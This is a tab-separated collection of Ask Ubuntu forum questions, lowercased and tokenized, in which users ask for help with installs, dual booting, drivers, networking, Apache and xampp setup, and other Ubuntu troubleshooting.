436635	ubuntu 12.04 wo n't boot into any mode	recently i built my own pc and have been struggling to get ubuntu 12.04 installed on it . i have a 16 gb ram machine with an asus m5a99fx pro r2.0 motherboard , an amd fx8350 processor and an amd r9 270x graphics card . i have windows 8 installed on a ssd but since this has been such a problem , i have only got a 160gb hdd attached to isolate it . when i boot from a live cd it sometimes loads and lets me install ubuntu . when this occasionally happens i install ubuntu and when i go to boot on the generic mode i get a purple screen . additionally , when i boot in recovery mode it hangs on a blackscreen saying switched to clocksource tsc . i have tried the nomodeset kernel modification and made sure that secure and fast boot is disabled in the bios . does anyone else have similar problems or similar hardware that could help me at all ? i am relatively new to linux in general and i am all out of ideas . it goes without saying that i appreciate any help i can get . so i eventually started to try different distros to try and get this to work . i found that out of the popular distros , linux mint worked for my machine .
436640	laptop screen goes black after trying to install ubuntu 13.10	i 'm trying to dual boot my laptop with windows 8.1 and when i run ubuntu from a usb i am given something like this : but once i click on any it just goes black i tried setting the bios to legacy and disabling the secure , but this appears and then black again . i saw posts of setting it to nomodeset , but i do n't get this screen : so i 'm not exactly sure how to set it .
436642	is there a way to downgrade ubuntu without losing any files ?	i want to downgrade ubuntu 13.10 to ubuntu 12.04 lts without losing the installed apps and my files in the ubuntu folders .
436643	firefox install	i know i probably sound like a retard but i downloaded firefox earlier to replace netsurf because of stupid errors and i do n't know how to open a browser that is n't netsurf . i have firefox-28.0.tar.bz2 downloaded and i need help to open it .
436647	how do i do a clean install	i 've been a user of version 12.04 for about 6 months with a dual boot system with windows . in an attempt to delete windows , i made a mistake and needed to reformat the hard drive . i had version 12.04 on a cd and tried to do a boot install . it did n't work , probably because i needed the correct installer . i found an old thumb drive with ubuntu installed , and was able to load version 10.10 , thinking that the update process would be easy . unfortunately , it would n't update because the support for that version ended last year . so i downloaded the current version 12.04.4 to both a dvd and to a thumb drive , but neither would install . i tried to work with the terminal function , but have not been able to figure out the correct syntax . help . should i reformat the drive , if so , how ? or is there another way to install version 12.04 that i have n't tried ? ken
436648	xorg segmentation fault fglrx	http : //paste.opensuse.org/68562655 link to xorg log this happened all of a sudden and i have no idea what the cause is i tried using a older version of the kernel with no luck and tried downgrading fglrx ( with a diferent error about no configured screens and no screens thereafter ) i am using the latest beta fglrx and tried downgrading to xorg-edgers ppa . kernel 3.13.6 . i am very interested in learning more from this experience and any help/explanation would be apreciated
436649	possible to mount an eye-fi mobi card on ubuntu ?	i just took delivery on an eye-fi mobi sd card . when i stick it in the sd slot on my laptop , the kernel says that there 's no partition table and it basically ca n't find anything . when i run fdisk on it , i also see no partition table . attempts to write a partition table via fdisk had no effect . does anybody know whether it 's possible to mount these things ? edit — eye-fi support people have told me that it should indeed work , but that there are known issues with some sd card readers supplying less power than the cards require .
436653	lan but no wan acess	i have just moved and when i did i received a new dsl modem . i have set it up as a transparent bridge as i have an internal router . it is just like i had done before , except i got rid of my static ip . i changed my ubuntu server to dhcp . i can access any system on the lan and even ping them . i have no wan access . i have three other windows machines on the system and they can all use the wan . i have the following information : ifconfig eth0 link encap : ethernet hwaddr 90:2b:34:83:19:99 inet addr:192.168.1.102 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :922b:34ff : fe83:1999/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:26551 errors:0 dropped:0 overruns:0 frame:0 tx packets:3720 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2277376 ( 2.2 mb ) tx bytes:315728 ( 315.7 kb ) interrupt:41 base address:0xa000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1152 errors:0 dropped:0 overruns:0 frame:0 tx packets:1152 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:340833 ( 340.8 kb ) tx bytes:340833 ( 340.8 kb ) virbr0 link encap : ethernet hwaddr 6a:6b:63:67:72 : ce inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) route kernel ip routing table destination gateway genmask flags metric ref use iface default apt 0.0.0.0 ug 100 0 0 eth0 link-local * 255.255.0.0 u 1000 0 0 eth0 192.168.1.0 * 255.255.255.0 u 0 0 0 eth0 192.168.122.0 * 255.255.255.0 u 0 0 0 virbr0 ping lan : ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.1.1 : icmp_req=1 ttl=64 time=0.666 ms 64 bytes from 192.168.1.1 : icmp_req=2 ttl=64 time=0.652 ms 64 bytes from 192.168.1.1 : icmp_req=3 ttl=64 time=0.608 ms 64 bytes from 192.168.1.1 : icmp_req=4 ttl=64 time=0.622 ms -- - 192.168.1.1 ping statistics -- - 4 packets transmitted , 4 received , 0 % packet loss , time 3000ms rtt min/avg/max/mdev = 0.608/0.637/0.666/0.023 ms ping wan : ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . -- - 8.8.8.8 ping statistics -- - 4 packets transmitted , 0 received , 100 % packet loss , time 3022ms /etc/resolv.conf shows : ** # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # **do not edit this file by hand -- your changes will be overwritten nameserver 192.168.1.1**** /etc/network/interfaces shows : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the primary network interface auto eth0 iface eth0 inet dhcp # the loopback network interface auto lo iface lo inet loopback gateway 192.168.1.1 any help ? i am really frustrated with this .
436654	after downloading ubuntu 13.10 , i can not get an internet connection , why ?	i have read multiple answers to this questions , but none of them apply to someone with no ubuntu experience . please make suggestions as though you are speaking to someone with no knowledge . i have tried may of the things suggested and none have worked , but it could be because i am doing it incorrectly . thanks !
436660	popular application unetbootin executible file does nothing	grabbed unetbootin-linux-585 because i want to make an installation flash drive for ubuntu 12.04 ( 13.10 is unusable with bugs ) . i do n't normally work with downloaded executables in linux , but i followed the instructs on the website . i changed the file property to 'executable ' and ran chmod +x on the file location . when i try to run the file graphically or via the terminal , nothing happens . this ca n't be a problem with the software ; it 's too widely known and used . it should do something when executed . i 'm working in a fresh installation of ubuntu 13.10 . what can i do ? edit : the exact command , as requested : chmod +x ./downloads/unetbootin-linux everything else was done graphically . the file is checked to run as an executable and the permissions are read and write for owner and group . nothing happens . i can open a terminal and type ./downloads/unetbootin-linux-585 which returns a fresh prompt , no hanging . i rebooted my computer and downloaded a fresh copy of the file and repeated these steps . still nothing . i could just use the windows version to complete this task , but i 'm concerned that if something as simple as running an executable , without adding repositories or using a package manager , is n't going to work , then it indicates something more broadly wrong with my configuration . this is my second fresh install of 13.10 in as many days . things have n't been functioning smoothly .
436664	installation of ubuntu 13.10 desktop from iso file	i downloaded ubuntu-13.10-desktop-i386.iso from my ubuntu 10.04 lts . how to install ubuntu-13.10-desktop-i386.iso from my ubuntu 10.04 lts
436667	ubuntu will not properly load	i created a usb live cd using linux mints live usb tool . i then tried to boot from it and it will get to the first screen and then allow me to choose to try with out install . it then asks for a language and the it quits and restarts the entire computer . i have no idea why it wont load . edit : ubuntu 12.04.4 lts amd 64 . i was looking for trouble shooting ideas because i really did n't know where to go from there . my computer is home built and has some of the newest parts available http : //pcpartpicker.com/user/nonprofitgibi/saved/3179 lists all of my parts that i used but i 'll mention the things i thing might be important when it comes to this issue processor : amd fx-6300 3.5ghz 6-core motherboard : gigabyte ga-990fxa-ud5 atx am3+ ram : crucial ballistix smart tracer 4gb ( 1 x 4gb ) ddr3-1600 memory ( error in the parts list ) edit : no errors just straight off then it restarts all other options that i tried have done the same thing click enter and the screen goes blank except for memtest . how do i get to verbose mode and can i boot straight to init 3 , 2 , or 1 . how can i find the logs and should i try installing a virtual machine and booting up in there .
436672	1 mouse multi cursor same desktop	i 'm wondering if there is a software or a way ( maybe virtual machine ) to have 1 mouse device and maybe 10 or more virtual cursor at the same desktop that can be activated at once ( by pushing down caps lock or other hotkey ) move at once and act the same as the master mouse ( cursor 1 ) , so where ever cursor 1 goes the other moves at the exact same x.y angle and have the same distance like in the screenshot here.. going only to use this with web browser application does n't matter its firefox or chrome or opera etc.. just need the left click to be functioning.. if even right click works thats great but not necessary.. i hope you guys have any idea how to achieve this with linux or virtual machine but that is my goal anyway to be able to use 1 mouse device and up to 10 virtual or clone mouse cursor at the same desktop.. something like this p.s not to be rude or anything but i do n't really want to discuss why i need to have such setup at my pc and what i 'm going to use it for .
436673	ubuntu 12.04.4 boot problem with windows 7	i just installed ubuntu 12.04.4 on a separate partition with windows 7 as my primary os ( installed first ) i let ubuntu do the distribution of the partition under the `` install side-by-side '' option when booting up , there is no prompt asking for ubuntu so i googled it and some forums said to install easybcd and add an entry i did that and i got a new boot option , but when i boot into it i get a grub4dos command prompt asking for grub > commands i tried the following : startx - command not found boot - error 8 kernel must be loaded before booting sudo apt-get install ... - sudo not found i 've been breaking my head over this for the past 4 hours , but i ca n't figure it out . i 've tried reinstalling 5 times , i 've looked at all the possible forums i could think of and none of the solutions people had before helped . computer specs : inter i5-4670k cpu @ 3.40ghz 32gb ram z87-g45 msi mobo asus nvidia geforce gtx770 oss installed : primary : windows 7 professional secondary : ubuntu 12.04.4
436676	how do i change default gnomeplayer to flash set in firefox 27 preferences for ubuntu 13.10	i am pretty certain my installation of ubuntu 13.10 has the flash plugin installed , as i have checked this numerous times in the last 3 days and just recently watched the updates put it in from the adobe http site an hour ago ... so i know it is there , but i go to firefox 27 , make sure the flash plugin is activated , then go to applications and find that the gnomeplayer is set as the default and i try to change this to `` other '' and flash is still not playing . all gnash has been removed . i tell you i have been wrestling with this for 3 days on my own and am finally breaking down to ask for help . i must change the default gnomeplayer to the flash player in the applications of firefox , but i can not find the file to direct the `` other '' to , nor can i make it stick help !
436677	zip file help final core	i downloaded a game called final core and it is a zip file that i do n't know how to open . if anybody knows please help , thanks
436678	apt-get update & install apache2 fails `` temporary failure resolving ''	failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mp-worker_2.2.22-1ubuntu1.4_i386.deb temporary failure resolving 'sercurity.ubuntu.com' failed to fetch http : //id.archive.ubuntu.com/ubuntu/pool/main/s/ssl-cert/ssl-cert_1.028ubuntu0.1_all.deb temporary failure resolving 'id.archive.ubuntu.com' this is what i 'm seeing when i try to run sudo apt-get update and sudo apt-get install apache2 . i did an update on my instance yesterday and am now experiencing this . help me please , i am stuck on it .
436679	what is the difference between different `` compression '' systems ?	i 've always used tar and zip for compression , but recently i have heard about the *.z compression algorithm . this brought up a question for me : with all of these compression systems , which one is best for general use and compression ? running a few tests , i have discovered that tar , as i discovered , does not really compress ( unless explicitly specified ) . meaning , what is it good for compared to other compression methods ? i am already aware that zip is the most widely-used compression system , but should i use it instead of *.z , *.7z , .tar , or .tar. < insert ending here > ? post summary : should i use *.tar , *.z , *.7z , .tar , or .tar. < insert ending here > for the best compression ? if plain *.tar does n't compress , why do we use it ? edit : not all algorithms allow storing of linux permissions ( from what i learned ) . which do , and is there some sort of hack ( or script ) i could use to store permissions ?
436680	old amd linux drivers can not be downloaded from amd	if you guys are in my boat , you may also be looking for older catalyst drivers for your card . the problem here is that while amd does list some of the older drivers , half of them are not downloadable . when you click the links on the amd website for 12.1 - 12.4 , your browser will either get stuck in a pattern of freezing and loading , you will download an unusable .bin file for reason , or you will get a page full of gibberish . just wanted you all to know , if you do n't . since this is `` ask '' ubuntu , i need to ask if anyone of you fine folk know where to download old drivers . if you know of a website of have them yourself , please respond . so far i have found this site , which looks a bit less legit than i would like , but hey , the word `` school '' is in the link , so it must be trustworthy , right ? maybe not if it is an american site ... http : //****.ru/soft/_drivers/ati/linux/ also , i am downloading three right now , and the projected download time is about 2 hours . so , you have that . thank you all in advance .
436681	dual boot problem with windows 7 64bit and ubuntu 12.04.4 32bit	i 've tried to install ubuntu 12.04.4 on my windows 7 ultimate 64 bit preinstalled sony vaio s series laptop ( vpcs116fh ) . the problem is my laptop reboot when i choose `` install ubuntu alongside with windows 7 '' . my bios version is r0301q3 . and i 've checked my md5sum and the result is `` 14ad92270218a8925d802b3d3b6e140f '' . it seems exactly the same for 12.04.4 i386 iso file . and i tried both `` unetbootin-windows-585 '' and `` universal-usb-installer-1.9.5.2 '' to create my usb flash drive . still having the problem . any idea would b very much appreciated . thanks a million in advance .
436684	ubuntu 13.04 ( raring ) does n't see my wi-fi networks	i recently got a new hp pavilion 17 with windows 8 on it and decided to install 13.04 ( lts , iirc ) on it as a second os . the install seemed to go smoothly but now i 'm finding out that it 's not recognizing my normal wi-fi connection ; it does n't even see it , in fact . i am at least able to use a wired connection , but i 'd really like to be able to use my wi-fi as much as possible . i also tried sudo rfkill unblock all , and that did n't work , either . also , if any of this helps : the laptop does not have any physical wi-fi switches to my knowledge . this computer came with an uefi bios configuration . i used the wired connection during a couple of live sessions and while i was installing the system . could this have caused a problem ? ( seems unlikely to me though i did n't think it would hurt to ask ) . i seem to have a realtek network controller . when i ran lscw -c network , it also mentioned that something was `` unclaimed '' : *-network unclaimed description : network controller product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=0 resources : ioport:3000 ( size=256 ) memory : f0200000-f0203fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 07 serial : a0 : d3 : c1:65 : dd:17 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8106e-1_0.0.1 06/29/12 ip=192.168.0.17 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:47 ioport:2000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff memory : f0400000-f040ffff ( should note that i did n't run it as a superuser , though ) lspci tells me this : steven @ steven-hp-pavilion-17-notebook-pc : ~ $ sudo lspci -nn | grep -e 'net|eth' 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. device [ 10ec:8179 ] ( rev 01 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader [ 10ec:5229 ] ( rev 01 ) 05:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 07 ) '' unassigned '' ? i 'm going to keep trying to look for solutions , but in the meantime if anyone can give me some clues as to how to fix this , i 'd appreciate that . = )
436686	reconfigure keyboard layout - 13.10 , 14.04	i always modify keyboard layouts to add special characters as my needs . to modify the layout i open the codes under : /usr/share/x11/xkb/symbols/ the changes would apply after a re-login , or a reboot for the default one . but now on ubuntu 13.10 and 14.04 , with the new text entry settings , the changes donât take effect even after a reboot , if iâve enabled them before editting . is there any way to force ubuntu to reconfigure keyboard layouts , somewhat like dpkg-reconfigure locales for locales ? the files are saved correctly !
436690	white screen with black strips ubuntu 12.04 lts after install nvidia drivers	i was trying to install steam and it get me a message about that my nvidia drivers were outdated and they recommend me to install at least the nvidia 304 drivers , so i installed and rebooted my pc , because i 'm using ubuntu with windows 7 , i select the option of ubuntu , then i get a white screen with strips , then it turn to black with white characters and it 's all , the screen freeze there , i do n't even got the login screen , it was working fine before the install . i have an nvidia geforce 7300se/7200gs . i 'm writing this with the try ubuntu option to use the console , but i do n't know how to fix this . ( i 'm newbie with linux and english is not my first language so i 'm sorry if i wrote something wrong . )
436694	which programs are included in the livecd that are removed upon installation ?	i 've noticed when booting up ubuntu 13.10 â desktop x86-64 disc in `` try without installing '' mode that gparted is pre-installed , however if you install ubuntu to your hard drive the package is removed ( or purged ? not sure which ) during the installation process . i know for a fact that gparted is pre-installed in the livecd rather than installed by script during livecd boot , because i 've examined the filesystem.squashfs file . this makes me wonder what other programs are pre-installed but removed during installation . is there a full listing available somewhere ?
436699	is there a setting that makes all windows pop up in a specific display in xfce ?	i 'm currently using dual monitors in xfce . i have the position of the screens set up just fine , but when i open new applications , they always show up on the screen that 's on the left . ( which is my laptop 's screen . ) i would like to choose a primary monitor for new applications to open on . is this possible ? intel gpu , with os drivers
436701	incredibly slow wireless speeds in 13.10	i just switched to ubuntu from windows 7 today and i 'm working on getting some packages installed , but the download speeds are incredibly slow when trying to get the packages . i 'm pretty proficient with linux and have tried basic network connectivity troubleshooting , but my other windows machines are downloading at normal speeds.. for instance , i installed spotify and steam , and it took around two hours to get the two of those installed . currently , i 'm trying to get wine ( both from the terminal and using the ubuntu software center ) and it is downloading at speeds of around 50-75kbps when download speeds before i made the switch were at approximately 0.800-1.2mbps . i have tried the steps in this article , which yielded no results . any help would be greatly appreciated !
436703	installing mongo db on ubuntu 12.04 ?	i want to install mongodb on ubuntu . i am following the official instructions from install mongodb on ubuntu . now when i do : sudo apt-get update it 's giving me : w : duplicate sources.list entry http : //downloads-distro.mongodb.org/repo/ubuntu-upstart/ dist/10gen amd64 packages ( /var/lib/apt/lists/downloads-distro.mongodb.org_repo_ubuntu-upstart_dists_dist_10gen_binary-amd64_packages ) w : duplicate sources.list entry http : //downloads-distro.mongodb.org/repo/ubuntu-upstart/ dist/10gen i386 packages ( /var/lib/apt/lists/downloads-distro.mongodb.org_repo_ubuntu-upstart_dists_dist_10gen_binary-i386_packages ) w : you may want to run apt-get update to correct these problems i have also removed this entry manually but when i do : sudo apt-get update it again downloads the same files . i do n't know what the issue is . i want to install the latest mongodb .
436706	not able to install ubuntu with windows 7	first of all sorry if this question seams repeated i am a rookie , i tried many links but not able to do that is not working in my case . on my laptop currently windows 7 is installed and i want to install ubuntu alongside it , but i am not getting that option in my ubuntu to [ install alongside of it ] menu . i tried to select `` something else '' option but i do n't know how to partition it . it is my windows 7 disk image screen shot and this is screen shot for ubuntu gpart
436707	nginx-to enable autostart	i installed the docker container in my ubuntu 13.10 . along with this nginx webserver also installed.but every time i want to type this command service nginx restart . so how can i autorun the nginx ?
436712	about the dual booting	i am a beginner in ubuntu , so please help me to solve this problem . i bought a new laptop with a hard disk of 500 gb . first i installed windows 7 and allocated 400 gb for that . now i installed ubuntu using the windows installer with a usb pen drive in the 100 gb left for that . it worked perfectly . but i faced a problem when i reinstalled my windows 7 os . i am now unable to get the dual boot process back . i tried to re-install ubuntu , too . but when i tried to do that using the windows installer , i am not able to find the partitioned space of 100 gb already containing ubuntu os . it shows only the space wich is allocated for windows . this is my problem . now what should i do to get the dual boot back ?
436718	unknown type name gcc	i 'm trying to compile this source code http : //nrg.cs.ucl.ac.uk/mptcp/mptcp_userland_0.1.tar.gz and i 'm getting unknown type name 'u8 ' among other types ( u_int , u_char , u_long ... .etc ) i have ubuntu 12.04 lts and gcc version 4.6.3 how to solve this issue ? thank you
436719	`` wodim : permission denied . can not open scsi driver ! '' how to solve ?	when i 'm executing a cd writing command cdrecord -v -eject speed=48 dev=/dev/sg1 /tmp/newcd.iso it will output some errors in my log file like , wodim : permission denied . can not open scsi driver ! any one know how to solve this issue ? please help to find a solution
436723	lubuntu and ubuntu : slow windows moving with mouse	why if a large window is moved in ubuntu 12.04 ( unity ) or lubuntu 13.10 the window will move slow only if it 's moved with the mouse ? if the trackpad is used all works fineâś this is not happening in xubuntu .
436725	x11 forwarding in ssh	how to run x11 gui applications from a remote server using ssh ? for example : my first desktop 192.168.1.1 my second desktop ip 192.168.1.12 i 'm sshing from my first desktop to the second and i want to run the gui applications from the second and redirect x11 to the first .
436732	is there a way to upgrade from 12.04 desktop to 14.04 beta directly ?	is there a way to upgrade from 12.04 to 14.04 directly , maybe through terminal ? if so , could you tell me ? i do n't want to wait till 14.04 comes out but i do n't want to upgrade three times to get it . i 've had 13.10 on another machine . the speed difference is noticeable , even though this machine had ubuntu preinstalled and is quite speedy with 12.04 . thank you in advance . any answer is appreciated .
436733	unable to delete/modify files in the usb	i am unable to delet/modify files on the usb . the usb can not be formatted as it says disk is wirte protected . how do i change the settings.. i tried to do it but the usb does not allow me to change settings..pls help..
436734	why do i get an error saying i must be privileged to use `crontab -u` ?	i am trying to list all the cron jobs for all the users in my ubuntu system using the following command : for user in $ ( cut -f1 -d : /etc/passwd ) ; do crontab -u $ user -l ; done why am i getting the following error : must be privileged to use this -u
436738	freerdp looses connection : pa_queue_push ( ) aborting . why ?	on a ubuntu machine , i have the problem , that freerdp looses it 's connection to the remote machine ( windows 7 virtual machine ) caused by the following error : assertion 'q- > font ' failed at pulsecore/queue-c:83 , function pa_queue_push ( ) . aborting . this happens only sometimes and i ca n't really figure out , what 's the trigger . has anyone an idea ?
436741	how to do bonding in ubuntu 12.04 in vmware workstation ?	i followed process for bonding which is given on this site : https : //help.ubuntu.com/community/ubuntubonding but output is $ cat /proc/net/bonding/bond0 ethernet channel bonding driver : v3.7.1 ( april 27 , 2011 ) bonding mode : load balancing ( round-robin ) mii status : down mii polling interval ( ms ) : 0 up delay ( ms ) : 0 down delay ( ms ) : 0 and $ ifconfig bond0 link encap : ethernet hwaddr 86 : df : fa : d9:19:30 inet addr:172.16.71.11 bcast:172.16.71.255 mask:255.255.255.0 up broadcast master multicast mtu:9000 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1314 errors:0 dropped:0 overruns:0 frame:0 tx packets:1314 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:89822 ( 89.8 kb ) tx bytes:89822 ( 89.8 kb ) and the status of other two device eth0 and eth1 shows that 'device not managed ' , so what should i do ?
436742	the requested url /xampp/ was not found on this server .	i have a running xampp ( lampp ) in the /opt/lampp/htdocs/xampp directory . i have downloaded xampp 1.8.2-4 from here i start xampp by sudo /opt/lampp/lampp start/stop so whenever i hit localhost it redirects me to localhost/xampp now the problem is when i hit localhost/xampp its showing not found the requested url /xampp/ was not found on this server . apache/2.4.6 ( ubuntu ) server at localhost port 80 the problem is my localhost is now pointing to /var/www/index.html not to /opt directory apache is starting when i type in the terminal : $ service apache2 start * starting web server apache2 now , after stopping xampp by sudo /opt/lampp/lampp stop when i hit localhost its fetching index.html from var/www directory with a message it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . how can i make my xampp responds with sudo /opt/lampp/lampp start how it can be resolved ?
436744	itunestorhythm code not working ?	hello i am trying to install run this itunestorhythm . the supplied command is : itunestorhythm.py -w -a itunes\ music\ library.xml ~/.local/share/rhythmbox/rhythmdb.xml the error i am getting after inputting this command is : itunestorhythm.py : command not found edit - here is what i typed in console : fiver @ lala-land : ~/music/itunestorhythm-master $ ./itunestorhythm.py -w -a /media/media 1/sounds/i tunes/lybrary.xml ~/.local/share/rhythmbox/rhythmdb.xml
436745	no menu in menu bar	i 've tried macbuntu , but not quite like it . so i uninstalled it but ubuntu did n't restore completely . there are now only close , minimize , maximize buttons in the top menu bar , while originally there should be other options like `` file , edit , view , help etc ... '' , which disappeared now . it looks like this : i 've tried reset unity by unity -- reset but it does not work . i 'm using ubuntu desktop 12.04lts - ubuntu 3d .
436746	how to migrate active directory to openldap ?	anyone know how to migrate activedirectory to openldap ? is there tools for it ?
436747	how to configure sublime text 3 for javascript development ?	i have just installed sublime text 3 and i want to use it for javascript development ; i want to be able to run javascript code from the sublime console . how do i create a build system for javascript in ubuntu ?
436756	how to convert and slice jpg to psd and keep layers	copied to graphic & design i have several jpg designs of a website i 'm developing . i did a pure html website and then did a full webpage screenshot for the design part . now the client is asking for the psd files , is there any way i can convert the jpg designs to psd in gimp or any other software ? edit is there any way i can slice up the jpg into the individual layers ? for confidentiality reasons , i ca n't upload the actual designs but here is a sample from creative market :
436762	vsftpd upload “permission denied” issue	hi i have installed and configured ftp server on ubuntu vsftpd.config anonymous_enable=yes write_enable=yes when i try to upload files to the sever with filezilla , it fails : *550 permission denied . error : critical file transfer error . *
436765	installing tally	i have ubuntu server 12.4 installed . later i installed ubuntu desktop on there . i wanted to install tally9 ( server component ) which is a multi-user accounting sw , where centralized data base is managed and tally clients will access the data base to create invoices , vouchers etc so my question is how do i install tally 9 on ubuntu server
436766	ubuntu server apache2 ssl virtual host not working	i have fully set up a web server on ubuntu using ssl encryption . i am trying to set up the default -ssl file to point to the correct directories . geekychicgirls works completely fine , however thepeepinghole always resolves to geekychicgirls , any help is appreciated see code below . < ifmodule mod_ssl.c > < virtualhost *:443 > serveradmin webmaster @ nixcraft.com documentroot `` /var/www/thepeepinghole '' sslengine on sslcertificatefile /ssl/14252798.crt sslcertificatekeyfile /ssl/private.key sslcertificatechainfile /ssl/futureretrogaming.ca-bundle servername www.thepeepinghole.tk serveralias thepeepinghole.tk errorlog `` /var/www/thepeepinghole/log/error.log '' customlog `` /var/www/thepeepinghole/log/access.log '' common < directory /var/www/thepeepinghole > directoryindex index.html options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > < /virtualhost > < virtualhost *:443 > serveradmin webmaster @ nixcraft.com documentroot `` /var/www/geekychicgirls '' sslengine on sslcertificatefile /ssl/14252798.crt sslcertificatekeyfile /ssl/private.key sslcertificatechainfile /ssl/futureretrogaming.ca-bundle servername www.geekychicgirls.tk serveralias geekychicgirls.tk errorlog `` /var/www/geekychicgirls/log/error.log '' customlog `` /var/www/geekychicgirls/log/access.log '' common < directory /var/www/geekychicgirls > directoryindex index.html options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > < /virtualhost > < /ifmodule >
436767	external monitor recognized , but no signal	i 'm running ubuntu on an old macbook and everything seems to work fine but when i try to connect an external monitor , the monitor does n't get a signal ( monitor : `` no signal '' ) . in the system > displays it is recognized though . i also tried connecting it during startup and tried what was recommended in this post : external monitor recognized but getting `` no signal '' , but that did n't work . i 'm connencting using an old-school yellow video cable . terminal output : $ xrandr screen 0 : minimum 320 x 200 , current 2304 x 800 , maximum 32767 x 32767 lvds1 connected primary 1280x800+0+0 ( normal left inverted right x axis y axis ) 286mm x 179mm 1280x800 59.9*+ 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1024x768+1280+0 ( normal left inverted right x axis y axis ) 1mm x 257mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 dvi1 disconnected ( normal left inverted right x axis y axis ) tv1 unknown connection ( normal left inverted right x axis y axis ) 848x480 59.9 + 640x480 59.9 + 1024x768 59.9 800x600 59.9 virtual1 disconnected ( normal left inverted right x axis y axis )
436770	itunestorhythm errors	i have executed some of the code in this link : https : //github.com/esalgado/itunestorhythm but i am getting the error itunestorhythm.py : error : you must supply a source and destination it seems as though i have successfully accessed the file , but have not inputted something properly . more info can be see here : itunestorhythm code not working ? what did i try : fiver @ lala-land : ~/music/itunestorhythm-master $ ./itunestorhythm.py -w -a /home/fiver/music/library.xml ~/.local/share/rhythmbox/rhythmdb.xml reading input from /home/fiver/music/library.xml unable to open file . file not found
436771	hardware raid1 - ext4 errors wo n't go away with fsck	short summary : yesterday my server 's root drive ( raid1 , 2 identical drives mirrored ) was kicked into read-only . trying to reboot i saw superblock errors , so i boot into live-cd and fsck the drive . it found problems , fixed them , and i could mount the drive ok. smartmon ( in disk utility ) says both disks are healthy . yet on reboot the errors again appear and look identical , and root is only mounted read-only . this happened shortly after updating linux-server , can this be a kernel problem ? the procedure i took to fsck them : boot into livecd install lvm2 activate the volume group ( /dev/jitsu/root ) run fsck on the volume group should i have tried to fsck the physical drives instead ?
436775	ubuntu 12.04 gui crashes with one user and not the other	i have a unusual issue . i have the desktop version of ubuntu 12.04 . one user i have no problem at all , the other user the desktop crashes , turns black , removes the menus , etc ... totally nuts . never seen this before . i have tried every thing i could goggle to no avail . i even made sure the user with the issues belonged to the exact same group . tried to make the user identical and no dice . please help !
436778	installing linux kernel modules without plus + ( on arm )	installing linux kernel modules of version 3.4.79 , but i always get a foulder with 3.4.79+ . how can i install it without the + ? doing it with make arch=arm install_module_path=dest modules_install
436779	thumbnail problem with shotwell	when i save images offline in a separate hard drive for security , any images that are altered are greyed out . could anybody please help me . best regards ,
436783	client pc operating system to use with a ubuntu server	this might be a stupid question , but i 'm new to ubuntu . do you have to use ubuntu on the client pc 's to use ubuntu server ? or can you use windows 7 or windows 8 ? thank you .
436785	is there an option to make xterm 's font size much larger than huge ?	i use exterm often and always ctrl + right-click to set the font size to huge . however , i find that huge is very small in high-res devices . it looks really tiny on my laptop 's 10 inch fullhd monitor . i am wondering if there is any easy way to increase the font size further than huge . i searched the internet ( perhaps ineffectively ) and found no solution for this .
436786	.dav file plays in with totem , but winff can not identify it	i have a .dav file from a cctv system . it does n't play in most video players , but it does play successfully in the default videos/totem application in ubuntu 13.10 . i need it to play in other video players ( probably as some type of mp4 ) and so was planning on using ffmpeg to convert it . however , ffmpeg ( or at least winff , which i think should do everything ffmpeg can do ? ) can not identify it as a video . i assume this must be some codec funkiness , but what does videos use for codecs that ffmpeg would n't ? in the video information in videos , it details the codec as being `` n/a '' . ditto for the audio codec . how can i : identify what is allowing the video to play in videos use that information to convert it to a normal file type that a normal person could use ?
